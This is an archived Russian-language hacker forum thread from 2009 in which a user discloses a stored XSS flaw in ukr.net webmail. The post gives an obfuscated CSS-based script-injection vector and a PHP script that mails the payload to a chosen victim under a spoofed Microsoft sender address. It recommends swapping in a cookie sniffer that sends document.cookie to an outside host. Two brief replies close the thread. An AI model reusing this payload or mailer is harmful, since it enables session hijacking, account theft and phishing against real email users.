PDA

Просмотр полной версии : Active XSS [ukr.net]


Dimi4
14.05.2009, 23:55
Всем привет) На днях исследовал почту ukr.net'a :) Хотя нет, начну с того что мне жаль было постить это в паблике, так как проверено, быстро пофиксят.

Вообщем смотря сорцы одного из писем, я заметил что контент весь в :

<script>
messageBody = '\nPew pew!';
readmsgSetMessageBody();
</script>
Это уже выдвигало на некии мысли. Покопавшись еще чуть я остановился на таком вот векторе:

<font style="background:url\(javas/**/cript:eval(String.fromCharCode([evil encoded code])))">


Opera: [-]
IE: [+]
FF: [-]
Небольшой скриптик для отправки:
<?php
/**
* (c) Dimi4, 2009
*
*/
$target = "petya@ukr.net";
$subj = "Pew pew!";
$payload ="";
$evilcode="alert(1);"; //img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
$strlen= strlen($evilcode);
for($i=0; $i !== $strlen; $i++)
{
if($i+1 == $strlen) $payload .= ord($evilcode[$i]);
else $payload .= ord($evilcode[$i]).',';
}
$header = "From: support@microsoft.com\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$msg ='<font style="background:url\(javas/**/cript:eval(String.fromCharCode('.$payload.')))">';
mail($target,$subj,$msg,$header);
?>

Собстна меняем $target на нужное мыло, и $evilcode на ченить хекерское, например имедж со снифером:
img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;

.Slip
04.06.2009, 00:29
from roa

Exlibris
04.06.2009, 00:53
good блин хакер =(